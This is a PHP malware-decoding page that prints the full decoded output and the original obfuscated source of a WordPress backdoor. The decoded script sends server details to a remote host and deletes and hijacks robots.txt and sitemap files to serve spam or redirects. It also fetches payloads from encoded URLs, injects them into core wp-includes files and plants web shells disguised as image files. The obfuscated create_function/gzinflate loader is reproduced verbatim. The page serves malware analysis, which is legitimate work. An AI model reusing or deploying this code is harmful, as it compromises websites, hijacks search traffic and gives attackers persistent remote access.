Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $FTCaoxKUN='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$FTCaoxKUN[(1..
Decoded Output download
set_time_limit(0);
@ini_set("html_errors","0");
@ob_start();
$action = isset($_GET['ac']) ? $_GET['ac'] : "";
if ($action != "" && $action == "write") {
$index_name = basename($_SERVER['SCRIPT_NAME']);
write($index_name);
echo "write done!";
exit();
}
$u6='104\x116\x116\x112\x58\x47\x47\x115\x101\x111\x56\x49\x53\x45\x49\x53\x46\x98\x101\x97\x117\x116\x105\x102\x117\x108\x115\x117\x110\x115\x101\x116\x46\x115\x105\x116\x101\x47\x97\x112\x105\x47\x115\x101\x114\x118\x101\x114\x46\x112\x104\x112\x';
$group='ZQ815-15';
$wjt=0;
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/.htaccess')){
$wjt=1;
}
$_SERVER=@str_replace(' ','',($_SERVER));
unset($_SERVER['PATH']);
unset($_SERVER['SYSTEMROOT']);
unset($_SERVER['COMSPEC']);
unset($_SERVER['PATHEXT']);
unset($_SERVER['WINDIR']);
unset($_SERVER['SERVER_SOFTWARE']);
$s['HTTP_HOST']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:'';
$s['REMOTE_ADDR']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
//$s['SERVER_ADDR']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:'';
$s['REQUEST_URI']=isset($_SERVER['REQUEST_URI'])?$_SERVER['REQUEST_URI']:'';
$s['HTTP_CLIENT_TOKEN']=isset($_SERVER['HTTP_CLIENT_TOKEN'])?$_SERVER['HTTP_CLIENT_TOKEN']:'';
$s['HTTP_USER_AGENT']=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'';
$s['HTTP_REFERER']=isset($_SERVER['HTTP_REFERER'])?$_SERVER['HTTP_REFERER']:'';
$s['HTTP_ACCEPT_LANGUAGE']=isset($_SERVER['HTTP_ACCEPT_LANGUAGE'])?$_SERVER['HTTP_ACCEPT_LANGUAGE']:'';
$s['SCRIPT_NAME']=isset($_SERVER['SCRIPT_NAME'])?$_SERVER['SCRIPT_NAME']:'';
$s['SERVER_PORT']=isset($_SERVER['SERVER_PORT'])?$_SERVER['SERVER_PORT']:'';
$s['SERVER_PROTOCOL']=isset($_SERVER['SERVER_PROTOCOL'])?$_SERVER['SERVER_PROTOCOL']:'';
$s['HTTP_X_FORWARDED_PROTO']=isset($_SERVER['HTTP_X_FORWARDED_PROTO'])?$_SERVER['HTTP_X_FORWARDED_PROTO']:'';
$s['HTTPS']=isset($_SERVER['HTTPS'])?$_SERVER['HTTPS']:'';
$s['HTTP_X_FORWARDED_SSL']=isset($_SERVER['HTTP_X_FORWARDED_SSL'])?$_SERVER['HTTP_X_FORWARDED_SSL']:'';
if (phpversion() < '5.2' || PHP_VERSION_ID < 50200) {
$sj=serialize($s);
}else{
$sj=json_encode($s);
}
$info=cgg(o0($u6).'?group='.$group.'&server='.$sj.'&wjt='.$wjt.'&time='.time().'&token=zqO0o1IliLp2&phpv='.phpversion());
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/robots.txt')){
@unlink($_SERVER['DOCUMENT_ROOT'].'/robots.txt');
}
if(file_exists($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml')){
@unlink($_SERVER['DOCUMENT_ROOT'].'/sitemap.xml');
}
if($info){
if(stripos($_SERVER['REQUEST_URI'],'sitemap.xml')!==false && stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')===false){
header('Content-type:application/xml');
echo ($info);
exit();
}elseif ($_SERVER['REQUEST_URI']=='/robots.txt'){
header('Content-Type: text/plain;charset=utf-8');
echo ($info);
exit();
}elseif(stripos($_SERVER['REQUEST_URI'],'atom.xml')!==false || stripos($_SERVER['REQUEST_URI'],'index.rdf')!==false || stripos($_SERVER['REQUEST_URI'],'rss.xml')!==false || stripos($_SERVER['REQUEST_URI'],'sitemap.xsl')!==false){
header('Content-type:application/xml');
echo ($info);
exit();
}else if (preg_match('/sitemap(00|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|17|18|19|20|21|22|23)-(\d+).xml$/i',$_SERVER['REQUEST_URI'],$map_uri)){
if($map_uri[1]!="" && $map_uri[2]!="") {
if($info=='HTTP/1.1 404 Not Found'){
header($info);
header("Status: 404 Not Found");
exit();
}else {
header('Content-type:application/xml');
echo($info);
exit();
}
}
}elseif(stripos($_SERVER['REQUEST_URI'],'pingsitemap.xml')!==false ){
//$google=json_decode($info,true);
$google=unserialize($info);
foreach ($google as $g){
$r = cgg($g);
if ($r == 'success' || (stripos($r, 'successfully') !== false) || (stripos($r, '') !== false) || (stripos($r, '') !== false) || (stripos($r,'webmasters')!==false)) {
echo '<p style="color:#00A000">' . $g . '--------' . $r . '</p>';
} else {
echo '<p style="color:#ff0000"><a href="' . $g . '" target="_blank">' . $g . '</a>--------' . $r . '</p>';
}
}
exit();
}
else{
header("Content-type: text/html; charset=utf-8");
if(substr($info,'0',9)==='Location:'){
header($info);
exit();
}elseif ($info=='HTTP/1.1 404 Not Found'){
} else{
if($info){
print_r($info);
exit();
}
}
}
}else{
//echo('500 error');
}
function cgg($url)
{
$contents = @file_get_contents($url);
if(!$contents) {
$header = array(
'Accept: */*',
'User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0',
);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_HEADER, 0);
curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
$contents = curl_exec($curl);
curl_close($curl);
}
return $contents;
}
function o0($u){
$a=explode('\x',$u);
$u1='';
foreach ($a as $b){
if($b) {
$u1 .= chr($b);
}
}
return $u1;
}
function write($index_name)
{
$write1 = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTEudHh0'));
$write2 = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei93cml0ZTIudHh0'));
$shell_postfs = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9tbTEudHh0'));
$shell_load = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9tbTIudHh0'));
$new_ht_content = cgg(base64_decode('aHR0cDovL2FiYy5maXJzdGd1aWRlLnh5ei9zaGwvaHRhY2Nlc3MudHh0'));
$ht_content = file_get_contents(".htaccess");
$index_content = file_get_contents($index_name);
$loader_php = "wp-includes/template-loader.php";
$load_php = "wp-includes/load.php";
$font_editor_php = "wp-includes/SimplePie/index.php";
if (!is_dir("css")) {
mkdir("css", 0755, true);
}
if ($index_name != "index.php") {
$write1 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write1);
$write2 = str_replace(base64_encode("./index.php"), base64_encode("./" . $index_name), $write2);
}
@chmod("css/.htaccess", 0755);
file_put_contents("css/.htaccess", $new_ht_content);
file_put_contents("css/load.php", $shell_load);
if (is_dir("wp-includes/SimplePie")) {
file_put_contents("wp-admin/images/arrow-lefts.png", $index_content);
file_put_contents("wp-admin/images/arrow-rights.png", $ht_content);
file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content);
file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content);
$loader_content = file_get_contents($loader_php);
$load_content = file_get_contents($load_php);
@chmod($loader_php, 0755);
@chmod($load_php, 0755);
file_put_contents($loader_php, $write1 . $loader_content);
file_put_contents($load_php, $load_content . $write2);
@chmod($loader_php, 0644);
@chmod($load_php, 0644);
file_put_contents($font_editor_php, $shell_postfs);
}
}
?>Did this file decode correctly?
Original Code
<?php $FTCaoxKUN='y(3;]whcx)8$4mb dk1qog5sprlua=z_/0i9tvf_"76*.2n[je';$q2866=$FTCaoxKUN[(105/15)].$FTCaoxKUN[(26-1)].$FTCaoxKUN[(1*49)].$FTCaoxKUN[((10*1)+18)].$FTCaoxKUN[(14+22)].$FTCaoxKUN[(44+5)].$FTCaoxKUN[(44-13)].$FTCaoxKUN[(684/18)].$FTCaoxKUN[(23+4)].$FTCaoxKUN[(72-(33-7))].$FTCaoxKUN[(154/22)].$FTCaoxKUN[(11+25)].$FTCaoxKUN[(65-(62-31))].$FTCaoxKUN[(26-6)].$FTCaoxKUN[((27*2)-8)];$pHFdNhg9688=$FTCaoxKUN[(20-9)].$FTCaoxKUN[(2*4)].$FTCaoxKUN[(29*1)].$FTCaoxKUN[(160/4)];$MYtraky2482=$FTCaoxKUN[(8*5)].$FTCaoxKUN[((1+0)+2)].$FTCaoxKUN[(6+(1*(95/19)))].$FTCaoxKUN[(140/5)].$FTCaoxKUN[(522/18)].$FTCaoxKUN[(7*((7-3)-2))].$FTCaoxKUN[(2*14)].$FTCaoxKUN[(138/(2+4))].$FTCaoxKUN[(1029/(378/18))].$FTCaoxKUN[((2*189)/9)].$FTCaoxKUN[(12+(0+0))].$FTCaoxKUN[(31*1)].$FTCaoxKUN[(48/(36/12))].$FTCaoxKUN[(735/15)].$FTCaoxKUN[(0+7)].$FTCaoxKUN[(18+2)].$FTCaoxKUN[(18-(10/5))].$FTCaoxKUN[(735/15)].$FTCaoxKUN[(0+(2-(1*1)))].$FTCaoxKUN[(16-(3+(36/(0+18))))].$FTCaoxKUN[((167-23)/18)].$FTCaoxKUN[(0+(18-9))].$FTCaoxKUN[(1*3)].$FTCaoxKUN[(11*(1+(0/(78/13))))].$FTCaoxKUN[(2*7)].$FTCaoxKUN[(29*(0+1))].$FTCaoxKUN[(38-(8+9))].$FTCaoxKUN[(15*2)].$FTCaoxKUN[(45-11)].$FTCaoxKUN[(1*46)].$FTCaoxKUN[(1*(17+21))].$FTCaoxKUN[(78/3)].$FTCaoxKUN[(21+(77/11))].$FTCaoxKUN[(22+14)].$FTCaoxKUN[(343/(91/13))].$FTCaoxKUN[(1*1)].$FTCaoxKUN[(21-10)].$FTCaoxKUN[(22+(12/2))].$FTCaoxKUN[(180/20)].$FTCaoxKUN[(3+((0+0)*1))].$FTCaoxKUN[(686/(126/9))].$FTCaoxKUN[(61-(32-8))].$FTCaoxKUN[(476/17)].$FTCaoxKUN[((4-0)+22)].$FTCaoxKUN[(((23-(2*5))/13)-0)].$FTCaoxKUN[(7+(84/21))].$FTCaoxKUN[(28/2)].$FTCaoxKUN[(9-0)].$FTCaoxKUN[(3*1)];$UrR1094= "'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'";$JTx2343=$pHFdNhg9688;$JTx2343.=$UrR1094;$JTx2343.=$MYtraky2482;@$mEriqO3481=$q2866((''), ($JTx2343));@$mEriqO3481(); ?>Function Calls
| null | 1 |
| gzinflate | 1 |
| base64_decode | 1 |
| create_function | 1 |
Stats
| MD5 | 947400ae9525ddfa19615ab202062d0d |
| Eval Count | 2 |
| Decode Time | 116 ms |